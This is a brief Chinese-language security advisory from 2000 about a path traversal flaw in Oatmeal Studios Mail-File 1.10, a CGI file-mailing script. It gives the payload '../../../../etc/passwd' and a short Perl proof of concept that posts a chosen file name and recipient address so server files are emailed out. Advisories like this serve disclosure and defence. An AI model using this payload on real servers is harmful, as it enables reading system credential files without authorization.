MailFile可以查看任意文件的漏洞发布时间:2000-10-18 更新时间:2000-10-18 严重程度:中 威胁程度:远程非授权文件存取 错误类型:输入验证错误 利用方式:服务器模式 受影响系统 Oatmeal Studios Mail File 1.10详细描述 OatMeal studios' Mail-File是一个CGI应用程序允许通过WEB接口来向EMAIL用户 发送文件,其中脚本存在漏洞,可以发送<i>any</i>中的内容给EMAIL用户, 当使用正常的时候,WEB接口提供用户可选择选项来选择文件发送,其中表单 中的变量是每一个的"pre-configured file"就是实际打开的文件。这样如果 用户可以使用特殊的文件和目录来代替正常的文件名而获得文件内容信息。如 ("../../../../../../../../../etc/passwd"). 测试代码 --snip-- #!/usr/bin/perl use HTTP::Request::Common; use LWP::UserAgent; $ua = LWP::UserAgent->new; $res = $ua->request(POST 'http://domain/mailfile.cgi', [real_name => 'value1', email => 'value2', filename => 'value3', ]); --snip-- value3=目标文件名 value2=发送到哪里 value1=用户名 解决方案 尚无 相关信息 |
